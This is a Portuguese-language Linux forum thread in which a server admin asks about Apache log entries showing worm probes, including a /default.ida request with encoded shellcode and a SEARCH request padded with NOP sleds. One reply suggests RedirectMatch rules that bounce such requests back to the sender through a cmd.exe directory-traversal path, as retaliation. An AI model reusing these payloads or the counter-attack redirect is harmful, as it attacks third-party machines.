Página 1 de 2 12 ÚltimoÚltimo
+ Responder ao Tópico



  1. Se não me engano isto é tentativa de acesso de um worm a um web server Microsoft? Sempre acho vários desses nos meus logs do apache....

    200.XXX.110.XXX - - [27/Jul/2004:15:32:41 -0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%
    u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090
    %u9090%u8190%u00c3 %u0003%u8b00%u531b%u53ff%u0078%u000
    0%u00=a HTTP/1.0" 404 300

    auehuaeaeu isso nem me deixa preocupado!

    Mas isso me deixa:

    200.XXX.250.XXX- - [27/Jul/2004:21:07:10 -0300] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\
    xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb
    1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\
    02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02
    \xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\
    x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02
    \xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\
    x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\
    xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x..........x90\x90\x90\x90\x90\x90\
    x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
    x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
    x90\x90\x90\x90\x90" 414 341

    eu resumi este log pois os caracteres chegam a 3 paginas mais ou menos... grande! O que será que causa isso?

  2. #2
    slice
    hehehehe!!!

    São worms mesmo...
    Sempre aparece estas porcarias no log do meu apache tbém...
    Mas eu costumo devolver estas requisições para o próprio dono :-)
    Se ele tem vírus ele tem windows... se ele tem windows ele é vulnerável... e se ele quer me derrubar então ele pode cair tbém :-P
    Se teu log ficar muito poluído, o que provavelmente ficará... faça um script que varre o log e limpa ele.


    Inclua isso no seu httpd.conf

    <Directory /var/www/>
    AllowOverride None
    Order allow,deny
    Allow from all

    RedirectMatch (.*)\default.ida$ http://127.0.0.1/scripts/..%255c..%2...tWindowsEX%201

    RedirectMatch (.*)\cmd.exe$ http://127.0.0.1/scripts/..%255c..%2...tWindowsEX%201

    RedirectMatch (.*)\root.exe$ http://127.0.0.1/scripts/..%255c..%2...tWindowsEX%201

    RedirectMatch (.*)\SEARCH$ http://127.0.0.1/scripts/..%255c..%2...tWindowsEX%201
    </Directory>

    PS.: Aqui saiu quebrada a linha mas é tudo na mesma linha... como na linha abaixo:
    RedirectMatch (.*)\SEARCH$ http://127.0.0.1/.................

    flw

    Slice



  3. hummm......po legal cara...não sabia desta de redirecionar.... valeu....
    vou fazer uns testes e procurar saber mais a respeito ....

  4. #4
    slice
    Se descobrir mais alguma coisa interessante, posta aí pra gente!!!

    []'s

    Slice



  5. #5
    slice
    PiTsA

    dê uma olhada no awstats é um excelente analizador de logs do apache, fantástico... e tem uma parte que vc configura ele para reconhecer no log do apache alguns worms...

    http://awstats.sourceforge.net/

    flw!

    Slice






Tópicos Similares

  1. Alguém já viu esse erro??
    Por Futuremax no fórum Servidores de Rede
    Respostas: 2
    Último Post: 05-02-2003, 14:33
  2. Respostas: 9
    Último Post: 23-01-2003, 18:07
  3. Respostas: 10
    Último Post: 23-01-2003, 04:34
  4. Vejam esse script firewall/nat, aonde tá o erro?
    Por no fórum Servidores de Rede
    Respostas: 5
    Último Post: 02-11-2002, 21:47
  5. Tem como fazer esses compartilhamentos?
    Por vandemberg no fórum Servidores de Rede
    Respostas: 3
    Último Post: 24-10-2002, 08:13

Visite: BR-Linux ·  VivaOLinux ·  Dicas-L